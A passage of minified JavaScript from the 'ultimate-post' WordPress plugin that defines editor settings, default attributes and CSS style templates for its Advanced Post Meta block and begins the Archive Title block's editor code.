Position","ultimate-post")},{type:"separator",label:"Icon"},{type:"toggle",key:"viewIconShow",label:__("Enable Icon","ultimate-post"),pro:!0},{type:"icon",key:"viewIconStyle",label:__("Select Icon","ultimate-post")},{type:"color",key:"viewIconColor",label:__("Icon Color","ultimate-post")},{type:"range",key:"viewIconSize",min:0,max:100,responsive:!0,step:1,unit:!0,label:__("Icon Size","ultimate-post")},{type:"range",key:"viewIconSpace",min:0,max:100,responsive:!0,step:1,unit:!0,label:__("Icon Space X","ultimate-post")},{type:"toggle",key:"viewAlign",label:__("Right Align","ultimate-post")}]},readTime:{label:__("Reading Time","ultimate-post"),action:"readTimeShow",inner:[{type:"color",key:"readColor",label:__("Color","ultimate-post")},{type:"color",key:"readHovColor",label:__("Hover Color","ultimate-post")},{type:"typography",key:"readTypo",label:__("Typography","ultimate-post")},{type:"separator",label:"Prefix"},{type:"toggle",key:"readTimePrefix",label:__("Enable Prefix","ultimate-post")},{type:"text",key:"readTimeText",label:__("Time Text","ultimate-post")},{type:"group",key:"readPrefixAlign",options:[{label:"After Content",value:"after"},{label:"Before Content",value:"before"}],justify:!0,label:__("Prefix Position","ultimate-post")},{type:"separator",label:"Icon"},{type:"toggle",key:"readTimeIcon",label:__("Enable Icon","ultimate-post"),pro:!0},{type:"icon",key:"readIconStyle",label:__("Select Icon","ultimate-post")},{type:"color",key:"readIconColor",label:__("Icon Color","ultimate-post")},{type:"range",key:"readIconSize",min:0,max:100,responsive:!0,step:1,unit:!0,label:__("Icon Size","ultimate-post")},{type:"range",key:"readIconSpace",min:0,max:100,responsive:!0,step:1,unit:!0,label:__("Icon Space X","ultimate-post")},{type:"toggle",key:"readAlign",label:__("Right Align","ultimate-post")}]},cat:{label:__("Category","ultimate-post"),action:"catShow",inner:[{type:"color",key:"catColor",label:__("Color","ultimate-post")},{type:"color",key:"catHovColor",label:__("Hover Color","ultimate-post")},{type:"typography",key:"catTypo",label:__("Typography","ultimate-post")},{type:"range",key:"catSpace",min:0,max:100,step:1,responsive:!0,unit:!0,label:__("Category Spacing","ultimate-post")},{type:"separator",label:"Label"},{type:"toggle",key:"catLabelShow",label:__("Category Label Show","ultimate-post")},{type:"text",key:"catLabel",label:__("Category Label Text","ultimate-post")},{type:"color",key:"catLabelColor",label:__("Label Color","ultimate-post")},{type:"range",key:"catLabelSpace",min:0,max:100,step:1,responsive:!0,unit:!0,label:__("Label Spacing","ultimate-post")},{type:"separator",label:"Icon"},{type:"toggle",key:"catIconShow",label:__("Enable Icon","ultimate-post"),pro:!0},{type:"icon",key:"catIconStyle",label:__("Select Icon","ultimate-post")},{type:"color",key:"catIconColor",label:__("Icon Color","ultimate-post")},{type:"range",key:"catIconSize",min:0,max:100,responsive:!0,step:1,unit:!0,label:__("Icon Size","ultimate-post")},{type:"range",key:"catIconSpace",min:0,max:100,responsive:!0,step:1,unit:!0,label:__("Icon Space X","ultimate-post")},{type:"toggle",key:"catAlign",label:__("Align Right","ultimate-post")}]},tag:{label:__("Tags","ultimate-post"),action:"tagShow",inner:[{type:"color",key:"tagColor",label:__("Color","ultimate-post")},{type:"color",key:"tagHovColor",label:__("Hover Color","ultimate-post")},{type:"typography",key:"tagTypo",label:__("Typography","ultimate-post")},{type:"range",key:"tagSpace",min:0,max:100,step:1,responsive:!0,unit:!0,label:__("Category Spacing","ultimate-post")},{type:"separator",label:"Label"},{type:"toggle",key:"tagLabelShow",label:__("Tag Label Show","ultimate-post")},{type:"text",key:"tagLabel",label:__("Tag Label Text","ultimate-post")},{type:"color",key:"tagLabelColor",label:__("Label Color","ultimate-post")},{type:"range",key:"tagLabelSpace",min:0,max:100,step:1,responsive:!0,unit:!0,label:__("Label Spacing","ultimate-post")},{type:"toggle",key:"tagIconShow",label:__("Enable Icon","ultimate-post"),pro:!0},{type:"separator",label:"Icon"},{type:"icon",key:"tagIconStyle",label:__("Select Icon","ultimate-post")},{type:"color",key:"tagIconColor",label:__("Icon Color","ultimate-post")},{type:"range",key:"tagIconSize",min:0,max:100,responsive:!0,step:1,unit:!0,label:__("Icon Size","ultimate-post")},{type:"range",key:"tagIconSpace",min:0,max:100,responsive:!0,step:1,unit:!0,label:__("Icon Space X","ultimate-post")},{type:"toggle",key:"tagAlign",label:__("Right Align","ultimate-post")}]}}}}],store:t})),(0,o.createElement)(i.Section,{slug:"advanced",title:__("Advanced","ultimate-post")},(0,o.createElement)(a.yB,{store:t}),(0,o.createElement)(a.Mg,{pro:!0,store:t}),(0,o.createElement)(a.iv,{store:t})))}},89471:(e,t,l)=>{"use strict";l.d(t,{Z:()=>o});const o={blockId:{type:"string",default:""},currentPostId:{type:"string",default:""},authorShow:{type:"boolean",default:!0},dateShow:{type:"boolean",default:!0},cmtCountShow:{type:"boolean",default:!0},viewCountShow:{type:"boolean",default:!1},readTimeShow:{type:"boolean",default:!1},catShow:{type:"boolean",default:!1},tagShow:{type:"boolean",default:!1},metaSpacing:{type:"object",default:{lg:"15",unit:"px"},style:[{selector:"{{ULTP}} .ultp-meta-separator::after {margin: 0 {{metaSpacing}};}"},{depends:[{key:"metaSeparator",condition:"==",value:"emptyspace"}],selector:"{{ULTP}} .ultp-advance-post-meta > div { gap:{{metaSpacing}}; }"}]},metaAlign:{type:"string",default:"left",style:[{depends:[{key:"metaAlign",condition:"==",value:"right"},{key:"authAlign",condition:"==",value:!1},{key:"dateAlign",condition:"==",value:!1},{key:"cmntAlign",condition:"==",value:!1},{key:"viewAlign",condition:"==",value:!1},{key:"readAlign",condition:"==",value:!1},{key:"catAlign",condition:"==",value:!1},{key:"tagAlign",condition:"==",value:!1}],selector:"{{ULTP}} .ultp-block-wrapper .ultp-advance-post-meta, \n          {{ULTP}} .ultp-contentMeta > div { justify-content:{{metaAlign}}; }"},{depends:[{key:"metaAlign",condition:"==",value:"center"},{key:"authAlign",condition:"==",value:!1},{key:"dateAlign",condition:"==",value:!1},{key:"cmntAlign",condition:"==",value:!1},{key:"viewAlign",condition:"==",value:!1},{key:"readAlign",condition:"==",value:!1},{key:"catAlign",condition:"==",value:!1},{key:"tagAlign",condition:"==",value:!1}],selector:"{{ULTP}} .ultp-block-wrapper .ultp-advance-post-meta, \n          {{ULTP}} .ultp-contentMeta > div { justify-content:{{metaAlign}}; }"},{depends:[{key:"metaAlign",condition:"==",value:"left"},{key:"authAlign",condition:"==",value:!1},{key:"dateAlign",condition:"==",value:!1},{key:"cmntAlign",condition:"==",value:!1},{key:"viewAlign",condition:"==",value:!1},{key:"readAlign",condition:"==",value:!1},{key:"catAlign",condition:"==",value:!1},{key:"tagAlign",condition:"==",value:!1}],selector:"{{ULTP}} .ultp-block-wrapper .ultp-advance-post-meta, \n          {{ULTP}} .ultp-contentMeta > div { justify-content:{{metaAlign}}; }"}]},metaSeparator:{type:"string",default:"dot"},separatorColor:{type:"string",default:"var(--postx_preset_Contrast_1_color)",style:[{selector:"{{ULTP}} .ultp-meta-separator::after { color: {{separatorColor}};}"},{depends:[{key:"metaSeparator",condition:"==",value:"dot"}],selector:"{{ULTP}} .ultp-meta-separator::after { background:{{separatorColor}};}"}]},metaCommonColor:{type:"string",default:"var(--postx_preset_Contrast_1_color)",style:[{selector:"{{ULTP}} .ultp-advance-post-meta  span { color:{{metaCommonColor}};}"}]},commonTypo:{type:"object",default:{openTypography:1,size:{lg:15,unit:"px"},height:{lg:20,unit:"px"}},style:[{selector:"{{ULTP}}  .ultp-advance-post-meta div > span > span"}]},metaItemSort:{type:"array",default:["author","date","cmtCount","viewCount","readTime","cat","tag"]},authColor:{type:"string",default:"",style:[{selector:"{{ULTP}} .ultp-advance-post-meta span.ultp-auth-name, \n      {{ULTP}} .ultp-advance-post-meta a.ultp-auth-name { color:{{authColor}} }"}]},authHovColor:{type:"string",default:"",style:[{selector:"{{ULTP}} .ultp-advance-post-meta span.ultp-auth-name:hover, \n        {{ULTP}} .ultp-advance-post-meta a.ultp-auth-name:hover { color:{{authHovColor}} }"}]},authTypo:{type:"object",default:{openTypography:0,size:{lg:15,unit:"px"},height:{lg:20,unit:"px"}},style:[{selector:"{{ULTP}} .ultp-advance-post-meta span.ultp-auth-name, \n        {{ULTP}} .ultp-advance-post-meta span.ultp-auth-heading, \n        {{ULTP}} .ultp-advance-post-meta a.ultp-auth-name"}]},authImgShow:{type:"boolean",default:!1},authImgSize:{type:"object",default:{lg:"18",unit:"px"},style:[{depends:[{key:"authImgShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-auth-heading img { width:{{authImgSize}}; height:{{authImgSize}} }"}]},authImgRadius:{type:"object",default:{lg:"50",unit:"px"},style:[{depends:[{key:"authImgShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-auth-heading img { border-radius:{{authImgRadius}} }"}]},authImgSpace:{type:"object",default:{lg:"5",unit:"px"},style:[{depends:[{key:"authImgShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-auth-heading img { margin-right:{{authImgSpace}} }"}]},authLabelShow:{type:"boolean",default:!0},authLabel:{type:"string",default:"Author",style:[{depends:[{key:"authLabelShow",condition:"==",value:!0}]}]},authLabelColor:{type:"string",default:"var(--postx_preset_Contrast_2_color)",style:[{depends:[{key:"authLabelShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-advance-post-meta span.ultp-auth-heading .ultp-auth-label { color:{{authLabelColor}} }"}]},authLabelTypo:{type:"object",default:{openTypography:0,size:{lg:15,unit:"px"},height:{lg:20,unit:"px"}},style:[{depends:[{key:"authLabelShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-advance-post-meta span.ultp-auth-heading .ultp-auth-label"}]},authLabelSpace:{type:"object",default:{lg:"5",unit:"px"},style:[{depends:[{key:"authLabelShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-auth-heading .ultp-auth-label { margin-right:{{authLabelSpace}}; }"}]},authIconShow:{type:"boolean",default:!1},authIconStyle:{type:"string",default:"author1",style:[{depends:[{key:"authIconShow",condition:"==",value:!0}]}]},authIconColor:{type:"string",default:"var(--postx_preset_Contrast_2_color)",style:[{depends:[{key:"authIconShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-auth-heading svg { color:{{authIconColor}}; color:{{authIconColor}} }"}]},authIconSize:{type:"object",default:{lg:"16",unit:"px"},style:[{depends:[{key:"authIconShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-auth-heading svg { height:{{authIconSize}}; width:{{authIconSize}} }"}]},authIconSpace:{type:"object",default:{lg:"10",unit:"px"},style:[{depends:[{key:"authIconShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-auth-heading svg { margin-right:{{authIconSpace}} }"}]},authAlign:{type:"boolean",default:!1,style:[{depends:[{key:"authorShow",condition:"==",value:!0}]}]},dateFormat:{type:"string",default:"updated"},metaDateFormat:{type:"string",default:"M j, Y"},dateColor:{type:"string",default:"",style:[{selector:"{{ULTP}} .ultp-advance-post-meta span.ultp-date-meta span.ultp-post-date__val { color:{{dateColor}} }"}]},dateTypo:{type:"object",default:{openTypography:0,size:{lg:15,unit:"px"},height:{lg:20,unit:"px"}},style:[{selector:"{{ULTP}} .ultp-advance-post-meta span.ultp-date-meta > span"}]},enablePrefix:{type:"boolean",default:!0},datePubText:{type:"string",default:"Publish Update",style:[{depends:[{key:"enablePrefix",condition:"==",value:!0},{key:"dateFormat",condition:"==",value:"publish"}]}]},dateText:{type:"string",default:"Latest Update",style:[{depends:[{key:"dateFormat",condition:"==",value:"updated"},{key:"enablePrefix",condition:"==",value:!0}]}]},datePrefixColor:{type:"string",default:"var(--postx_preset_Contrast_2_color)",style:[{depends:[{key:"enablePrefix",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-advance-post-meta span.ultp-date-meta > span.ultp-date-prefix {color:{{datePrefixColor}}}"}]},DateIconShow:{type:"boolean",default:!1},dateIconStyle:{type:"string",default:"date1",style:[{depends:[{key:"DateIconShow",condition:"==",value:!0}]}]},dateIconColor:{type:"string",default:"var(--postx_preset_Contrast_2_color)",style:[{depends:[{key:"DateIconShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-date-icon svg { color:{{dateIconColor}}; }"}]},dateIconSize:{type:"object",default:{lg:"16",unit:"px"},style:[{depends:[{key:"DateIconShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-date-icon svg { width:{{dateIconSize}}; height:{{dateIconSize}} }"}]},dateIconSpace:{type:"object",default:{lg:"10",unit:"px"},style:[{depends:[{key:"DateIconShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-date-icon svg { margin-right:{{dateIconSpace}} }"}]},dateAlign:{type:"boolean",default:!1,style:[{depends:[{key:"dateShow",condition:"==",value:!0}]}]},commentColor:{type:"string",default:"",style:[{selector:"{{ULTP}} .ultp-advance-post-meta span.ultp-comment-count { color:{{commentColor}} }"}]},commentHovColor:{type:"string",default:"",style:[{selector:"{{ULTP}} .ultp-advance-post-meta span.ultp-comment-count:hover { color:{{commentHovColor}} }"}]},commentTypo:{type:"object",default:{openTypography:0,size:{lg:15,unit:"px"},height:{lg:20,unit:"px"}},style:[{selector:"{{ULTP}} .ultp-advance-post-meta span.ultp-comment-count, \n        {{ULTP}} .ultp-advance-post-meta span.ultp-comment-label"}]},cmtLabelShow:{type:"boolean",default:!0},cmtLabel:{type:"string",default:"Comment",style:[{depends:[{key:"cmtLabelShow",condition:"==",value:!0}]}]},cmtLabelColor:{type:"string",default:"var(--postx_preset_Contrast_2_color)",style:[{depends:[{key:"cmtLabelShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-advance-post-meta span.ultp-comment-label { color:{{cmtLabelColor}} }"}]},commentLabelAlign:{type:"string",default:"after",style:[{depends:[{key:"commentLabelAlign",condition:"==",value:"before"},{key:"cmtLabelShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-comment-label {order: -1;margin-right: 5px;}"},{depends:[{key:"commentLabelAlign",condition:"==",value:"after"},{key:"cmtLabelShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-comment-label {order: 0; margin-left: 5px;}"}]},cmtIconShow:{type:"boolean",default:!1},cmntIconStyle:{type:"string",default:"commentCount1",style:[{depends:[{key:"cmtIconShow",condition:"==",value:!0}]}]},cmntIconColor:{type:"string",default:"var(--postx_preset_Contrast_2_color)",style:[{depends:[{key:"cmtIconShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-comment-count svg { color:{{cmntIconColor}}; color:{{cmntIconColor}}}"}]},commentIconSize:{type:"object",default:{lg:"16",unit:"px"},style:[{depends:[{key:"cmtIconShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-comment-count svg{ width:{{commentIconSize}}; height:{{commentIconSize}} }"}]},cmntIconSpace:{type:"object",default:{lg:"10",unit:"px"},style:[{depends:[{key:"cmtIconShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-comment-count svg { margin-right:{{cmntIconSpace}} }"},{depends:[{key:"cmtIconShow",condition:"==",value:!0},{key:"cmtLabelShow",condition:"==",value:!0},{key:"commentLabelAlign",condition:"==",value:"before"}],selector:"{{ULTP}} .ultp-comment-count svg { margin:0px {{cmntIconSpace}} } \n          {{ULTP}} .ultp-comment-label {margin:0px !important;}"}]},cmntAlign:{type:"boolean",default:!1,style:[{depends:[{key:"cmtCountShow",condition:"==",value:!0}]}]},viewColor:{type:"string",default:"",style:[{selector:"{{ULTP}} .ultp-advance-post-meta span.ultp-view-count { color:{{viewColor}} }"}]},viewHovColor:{type:"string",default:"",style:[{selector:"{{ULTP}} .ultp-advance-post-meta span.ultp-view-count:hover { color:{{viewHovColor}} }"}]},viewTypo:{type:"object",default:{openTypography:0,size:{lg:15,unit:"px"},height:{lg:20,unit:"px"}},style:[{selector:"{{ULTP}} .ultp-advance-post-meta span.ultp-view-count, \n        {{ULTP}} .ultp-advance-post-meta span.ultp-view-label"}]},viewLabelShow:{type:"boolean",default:!0},viewLabel:{type:"string",default:"View",style:[{depends:[{key:"viewLabelShow",condition:"==",value:!0}]}]},viewLabelColor:{type:"string",default:"var(--postx_preset_Contrast_2_color)",style:[{depends:[{key:"viewLabelShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-advance-post-meta span.ultp-view-label { color:{{viewLabelColor}} }"}]},viewLabelAlign:{type:"string",default:"after",style:[{depends:[{key:"viewLabelAlign",condition:"==",value:"before"},{key:"viewLabelShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-view-label {order: -1;margin-right: 5px;}"},{depends:[{key:"viewLabelAlign",condition:"==",value:"after"},{key:"viewLabelShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-view-label {order: 0; margin-left: 5px;}"}]},viewIconShow:{type:"boolean",default:!1},viewIconStyle:{type:"string",default:"viewCount1",style:[{depends:[{key:"viewIconShow",condition:"==",value:!0}]}]},viewIconColor:{type:"string",default:"var(--postx_preset_Contrast_2_color)",style:[{depends:[{key:"viewIconShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-view-count svg { color:{{viewIconColor}}; color:{{viewIconColor}} }"}]},viewIconSize:{type:"object",default:{lg:"16",unit:"px"},style:[{depends:[{key:"viewIconShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-view-count svg{ width:{{viewIconSize}}; height:{{viewIconSize}} }"}]},viewIconSpace:{type:"object",default:{lg:"10",unit:"px"},style:[{depends:[{key:"viewIconShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-view-count svg {margin-right:{{viewIconSpace}}}"},{depends:[{key:"viewIconShow",condition:"==",value:!0},{key:"viewLabelShow",condition:"==",value:!0},{key:"viewLabelAlign",condition:"==",value:"before"}],selector:"{{ULTP}} .ultp-view-count svg { margin:0px {{viewIconSpace}} } \n          {{ULTP}} .ultp-view-label {margin:0px !important;}"}]},viewAlign:{type:"boolean",default:!1,style:[{depends:[{key:"viewCountShow",condition:"==",value:!0}]}]},readColor:{type:"string",default:"",style:[{selector:"{{ULTP}} .ultp-advance-post-meta span.ultp-readTime-wrap { color:{{readColor}} }"}]},readHovColor:{type:"string",default:"",style:[{selector:"{{ULTP}} .ultp-advance-post-meta span.ultp-readTime-wrap:hover { color:{{readHovColor}} }"}]},readTypo:{type:"object",default:{openTypography:0,size:{lg:15,unit:"px"},height:{lg:20,unit:"px"}},style:[{selector:"{{ULTP}} .ultp-advance-post-meta span.ultp-readTime-wrap *"}]},readTimePrefix:{type:"boolean",default:!0},readTimeText:{type:"string",default:"Minute Read",0:{depends:[{key:"readTimePrefix",condition:"==",value:!0}]}},readPrefixAlign:{type:"string",default:"after",style:[{depends:[{key:"readPrefixAlign",condition:"==",value:"before"},{key:"readTimePrefix",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-read-label {order: -1;margin-right: 5px;}"},{depends:[{key:"readPrefixAlign",condition:"==",value:"after"},{key:"readTimePrefix",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-read-label {order: 0; margin-left: 5px;}"}]},readTimeIcon:{type:"boolean",default:!1},readIconStyle:{type:"string",default:"readingTime2",style:[{depends:[{key:"readTimeIcon",condition:"==",value:!0}]}]},readIconColor:{type:"string",default:"var(--postx_preset_Contrast_2_color)",style:[{depends:[{key:"readTimeIcon",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-readTime-wrap svg { color:{{readIconColor}}; color:{{readIconColor}}; }"}]},readIconSize:{type:"object",default:{lg:"16",unit:"px"},style:[{depends:[{key:"readTimeIcon",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-readTime-wrap svg { width:{{readIconSize}}; height:{{readIconSize}} }"}]},readIconSpace:{type:"object",default:{lg:"10",unit:"px"},style:[{depends:[{key:"readTimeIcon",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-readTime-wrap svg { margin-right:{{readIconSpace}} }"},{depends:[{key:"readTimeIcon",condition:"==",value:!0},{key:"readTimePrefix",condition:"==",value:!0},{key:"readPrefixAlign",condition:"==",value:"before"}],selector:"{{ULTP}} .ultp-readTime-wrap svg { margin:0px {{readIconSpace}} } \n          {{ULTP}} .ultp-read-label { margin:0px !important;}"}]},readAlign:{type:"boolean",default:!1,style:[{depends:[{key:"readTimeShow",condition:"==",value:!0}]}]},catColor:{type:"string",default:"",style:[{selector:"{{ULTP}} .ultp-advance-post-meta span.ultp-post-cat a { color:{{catColor}} }"}]},catHovColor:{type:"string",default:"",style:[{selector:"{{ULTP}} .ultp-advance-post-meta span.ultp-post-cat a:hover { color:{{catHovColor}} }"}]},catTypo:{type:"object",default:{openTypography:0,decoration:"none",size:{lg:15,unit:"px"},height:{lg:20,unit:"px"}},style:[{selector:"{{ULTP}} .ultp-advance-post-meta span.ultp-post-cat a, \n        {{ULTP}} .ultp-advance-post-meta span.ultp-cat-label"}]},catSpace:{type:"object",default:{lg:"7",unit:"px"},style:[{selector:"{{ULTP}} .ultp-post-cat a:not(:first-child) { margin-left:{{catSpace}} }"}]},catLabelShow:{type:"boolean",default:!0},catLabel:{type:"string",default:"Category",style:[{depends:[{key:"catLabelShow",condition:"==",value:!0}]}]},catLabelColor:{type:"string",default:"var(--postx_preset_Contrast_2_color)",style:[{depends:[{key:"catLabelShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-advance-post-meta span.ultp-cat-label { color:{{catLabelColor}} }"}]},catLabelSpace:{type:"object",default:{lg:"15",unit:"px"},style:[{depends:[{key:"catLabelShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-cat-label { margin-right:{{catLabelSpace}};}"}]},catIconShow:{type:"boolean",default:!1},catIconStyle:{type:"string",default:"cat2",style:[{depends:[{key:"catIconShow",condition:"==",value:!0}]}]},catIconSize:{type:"object",default:{lg:"16",unit:"px"},style:[{depends:[{key:"catIconShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-cat-wrap svg { height:{{catIconSize}}; width:{{catIconSize}} }"}]},catIconColor:{type:"string",default:"var(--postx_preset_Contrast_2_color)",style:[{depends:[{key:"catIconShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-cat-wrap svg, \n          {{ULTP}} .ultp-cat-wrap svg path, \n          {{ULTP}} .ultp-cat-wrap svg rect{ color:{{catIconColor}}; color:{{catIconColor}} }"}]},catIconSpace:{type:"object",default:{lg:"10",unit:"px"},style:[{depends:[{key:"catIconShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-cat-wrap svg {margin-right:{{catIconSpace}} }"}]},catAlign:{type:"boolean",default:!1,style:[{depends:[{key:"catShow",condition:"==",value:!0}]}]},tagColor:{type:"string",default:"var(--postx_preset_Contrast_2_color)",style:[{selector:"{{ULTP}} .ultp-advance-post-meta span.ultp-post-tag a { color:{{tagColor}} }"}]},tagHovColor:{type:"string",default:"var(--postx_preset_Contrast_1_color)",style:[{selector:"{{ULTP}} .ultp-advance-post-meta span.ultp-post-tag a:hover { color:{{tagHovColor}} }"}]},tagTypo:{type:"object",default:{openTypography:0,decoration:"none",size:{lg:15,unit:"px"},height:{lg:20,unit:"px"}},style:[{selector:"{{ULTP}} .ultp-advance-post-meta span.ultp-post-tag a, \n        {{ULTP}} .ultp-advance-post-meta span.ultp-tag-label"}]},tagSpace:{type:"object",default:{lg:"7",unit:"px"},style:[{selector:"{{ULTP}} .ultp-post-tag a:not(:first-child) { margin-left:{{tagSpace}};}"}]},tagLabelShow:{type:"boolean",default:!0},tagLabel:{type:"string",default:"Tag - ",style:[{depends:[{key:"tagLabelShow",condition:"==",value:!0}]}]},tagLabelColor:{type:"string",default:"var(--postx_preset_Contrast_2_color)",style:[{depends:[{key:"tagLabelShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-advance-post-meta span.ultp-tag-label { color:{{tagLabelColor}} }"}]},tagLabelSpace:{type:"object",default:{lg:"15",unit:"px"},style:[{depends:[{key:"tagLabelShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-tag-label { margin-right:{{tagLabelSpace}};}"}]},tagIconShow:{type:"boolean",default:!1},tagIconStyle:{type:"string",default:"tag2",style:[{depends:[{key:"tagIconShow",condition:"==",value:!0}]}]},tagIconColor:{type:"string",default:"var(--postx_preset_Contrast_2_color)",style:[{depends:[{key:"tagIconShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-tag-wrap svg, \n          {{ULTP}} .ultp-tag-wrap svg path {color:{{tagIconColor}}; color:{{tagIconColor}} }"}]},tagIconSize:{type:"object",default:{lg:"16",unit:"px"},style:[{depends:[{key:"tagIconShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-tag-wrap svg {height:{{tagIconSize}}; width:{{tagIconSize}}}"}]},tagIconSpace:{type:"object",default:{lg:"10",unit:"px"},style:[{depends:[{key:"tagIconShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-tag-wrap svg {margin-right:{{tagIconSpace}} }"}]},tagAlign:{type:"boolean",default:!1,style:[{depends:[{key:"tagShow",condition:"==",value:!0}]}]},...(0,l(92165).t)(["advanceAttr"],["loadingColor"])}},1565:(e,t,l)=>{"use strict";var o=l(67294),a=l(85977),i=l(89471),n=l(49681);const{__}=wp.i18n,{registerBlockType:r}=wp.blocks;r(n,{icon:(0,o.createElement)("img",{className:"ultp-block-icon",src:ultp_data.url+"assets/img/blocks/builder/post_meta.svg",alt:"Advanced Post Meta"}),category:"postx-site-builder",attributes:i.Z,edit:a.Z,save:()=>null})},94878:(e,t,l)=>{"use strict";l.d(t,{Z:()=>d});var o=l(67294),a=l(53049),i=l(99838),n=l(54324),r=l(92637),s=l(31760);const{__}=wp.i18n,{InspectorControls:p,useBlockProps:c}=wp.blockEditor,{Fragment:u}=wp.element;function d(e){const{setAttributes:t,name:l,attributes:d,clientId:m,className:g,attributes:{blockId:y,titleShow:b,prefixShow:v,prefixText:h,advanceId:f,showImage:k,layout:w,excerptShow:x,customTaxColor:T,customTaxTitleColor:_,titleTag:C,currentPostId:E}}=e,S={setAttributes:t,name:l,attributes:d,clientId:m};(0,n.S)({blockId:y,clientId:m,currentPostId:E,setAttributes:t,checkRef:!1}),y&&(0,i.Kh)(d,"ultimate-post/archive-title",y);const P="Archive Title",L=ultp_data.url+"assets/img/builder-fallback.jpg",I="#037fff",B="Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nam molestie aliquet molestie.",U=L?{backgroundImage:`url(${L})`}:{background:`${I}`},M=c({className:`ultp-block-${y} ${g}`,...f&&{id:f}});return(0,o.createElement)(u,null,(0,o.createElement)(p,null,(0,o.createElement)(r.Sections,null,(0,o.createElement)(r.Section,{slug:"setting",title:__("Settings","ultimate-post")},(0,o.createElement)(a.If,{store:S,initialOpen:!0,exclude:["columns","columnGridGap","contentTag","openInTab"],include:[{position:0,data:{type:"layout",col:2,imgPath:"assets/img/layouts/archive/popup/ar",block:"archive-title",key:"layout",label:__("Layout","ultimate-post"),options:[{img:"assets/img/layouts/archive/al1.png",demoUrl:"",label:__("Layout 1","ultimate-post"),value:"1"},{img:"assets/img/layouts/archive/al2.png",demoUrl:"",label:__("Layout 2","ultimate-post"),value:"2"}]}}]}),(0,o.createElement)(a.VH,{depend:"titleShow",store:S,exclude:["titlePosition","titleHoverColor","titleLength","titleBackground","titleStyle","titleAnimColor"],include:[{position:0,data:{type:"toggle",key:"customTaxTitleColor",label:__("Specific Color","ultimate-post"),pro:!0}},{position:1,data:{type:"linkbutton",key:"seperatorTaxTitleLink",placeholder:__("Choose Color","ultimate-post"),label:__("Taxonomy Specific (Pro)","ultimate-post"),text:"Choose Color"}}]}),(0,o.createElement)(a.Ny,{depend:"prefixShow",include:[{position:1,data:{type:"toggle",key:"prefixTop",label:__("Show on Top","ultimate-post")}}],store:S}),"2"==w&&(0,o.createElement)(a.HY,{store:S,exclude:["TaxAnimation"]}),"1"==w&&(0,o.createElement)(a.Hn,{depend:"showImage",store:S,exclude:["imgMargin","imgCropSmall","imgCrop","imgAnimation","imgOverlay","imageScale","imgOpacity","overlayColor","imgOverlayType","imgGrayScale","imgHoverGrayScale","imgShadow","imgHoverShadow","imgTab","imgHoverRadius","imgRadius","imgSrcset","imgLazy"],include:[{position:3,data:{type:"alignment",key:"contentAlign",responsive:!1,label:__("Alignment","ultimate-post"),disableJustify:!0}},{position:2,data:{type:"range",key:"imgSpacing",label:__("Img Spacing","ultimate-post"),min:0,max:100,step:1,responsive:!0}}]}),(0,o.createElement)(a.X_,{isTab:!0,depend:"excerptShow",store:S,title:__("Description","ultimate-post"),exclude:["showSeoMeta","excerptLimit","showFullExcerpt"]})),(0,o.createElement)(r.Section,{slug:"advanced",title:__("Advanced","ultimate-post")},(0,o.createElement)(a.yB,{store:S}),(0,o.createElement)(a.Mg,{store:S}),(0,o.createElement)(a.iv,{store:S}))),(0,a.dH)()),(0,o.createElement)(s.Z,{include:[{type:"layout",col:2,imgPath:"assets/img/layouts/archive/popup/ar",block:"archive-title",key:"layout",options:[{img:"assets/img/layouts/archive/al1.png",demoUrl:"",label:__("Layout 1","ultimate-post"),value:"1"},{img:"assets/img/layouts/archive/al2.png",demoUrl:"",label:__("Layout 2","ultimate-post"),value:"2"}],label:__("Layout","ultimate-post")}],store:S}),(0,o.createElement)("div",M,(0,o.createElement)("div",{className:"ultp-block-wrapper"},(0,o.createElement)("div",{className:`ultp-block-archive-title  ultp-archive-layout-${w}`},1==w&&(0,o.createElement)("div",null,L&&k&&(0,o.createElement)("img",{className:"ultp-archive-image",src:L,alt:P}),b&&(0,o.createElement)(a.VI,{tag:C,className:"ultp-archive-name",style:_?{color:I}:{}},v&&(0,o.createElement)("span",{className:"ultp-archive-prefix"},h," 